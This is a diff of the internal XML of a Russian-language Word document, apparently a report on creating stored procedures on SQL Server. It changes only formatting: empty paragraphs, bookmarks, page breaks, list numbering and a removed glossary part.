+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="37" w:name="_Toc420429746"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc420429547"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc420429547"/>
-      <w:bookmarkStart w:id="38" w:name="_Toc420429746"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>Листинг 5</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="37"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Создание хранимых процедур на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sql-сервере</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="38"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Создание хранимых процедур на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sql-сервере</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31197,7 +32322,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>as</w:t>
       </w:r>
     </w:p>
@@ -32169,6 +33293,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>USE [</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -32747,7 +33872,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -35573,6 +36697,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="24">
+    <w:nsid w:val="55282A3A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7E168724"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="25">
     <w:nsid w:val="5CA32A3F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF761446"/>
@@ -35658,7 +36868,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25">
+  <w:abstractNum w:abstractNumId="26">
     <w:nsid w:val="60310280"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0F5A5E48"/>
@@ -35744,7 +36954,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26">
+  <w:abstractNum w:abstractNumId="27">
     <w:nsid w:val="61153FB1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4B0683A2"/>
@@ -35830,7 +37040,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27">
+  <w:abstractNum w:abstractNumId="28">
     <w:nsid w:val="65E13A6D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6194F0AE"/>
@@ -35916,7 +37126,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28">
+  <w:abstractNum w:abstractNumId="29">
     <w:nsid w:val="6CBC4191"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0DB8C92E"/>
@@ -36065,7 +37275,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29">
+  <w:abstractNum w:abstractNumId="30">
     <w:nsid w:val="6FD21E29"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="861C4C5C"/>
@@ -36151,7 +37361,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30">
+  <w:abstractNum w:abstractNumId="31">
     <w:nsid w:val="72EA3BA9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0C101CDA"/>
@@ -36237,7 +37447,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="31">
+  <w:abstractNum w:abstractNumId="32">
     <w:nsid w:val="735258DD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BD808082"/>
@@ -36323,7 +37533,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="32">
+  <w:abstractNum w:abstractNumId="33">
     <w:nsid w:val="7BEB33CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B4C8150C"/>
@@ -36434,19 +37644,19 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="17"/>
@@ -36458,7 +37668,7 @@
     <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="10"/>
@@ -36467,7 +37677,7 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="21">
     <w:abstractNumId w:val="13"/>
@@ -36488,25 +37698,28 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="32"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="30">
     <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="32"/>
+    <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="32">
     <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="33">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="34">
+    <w:abstractNumId w:val="24"/>
   </w:num>
 </w:numbering>
 </file>
@@ -37071,319 +38284,6 @@
 </w:styles>
 </file>
 
-<file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:glossaryDocument xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
-  <w:docParts/>
-</w:glossaryDocument>
-</file>
-
-<file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
-<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
-  <w:font w:name="Symbol">
-    <w:panose1 w:val="05050102010706020507"/>
-    <w:charset w:val="02"/>
-    <w:family w:val="roman"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Times New Roman">
-    <w:panose1 w:val="02020603050405020304"/>
-    <w:charset w:val="CC"/>
-    <w:family w:val="roman"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Courier New">
-    <w:panose1 w:val="02070309020205020404"/>
-    <w:charset w:val="CC"/>
-    <w:family w:val="modern"/>
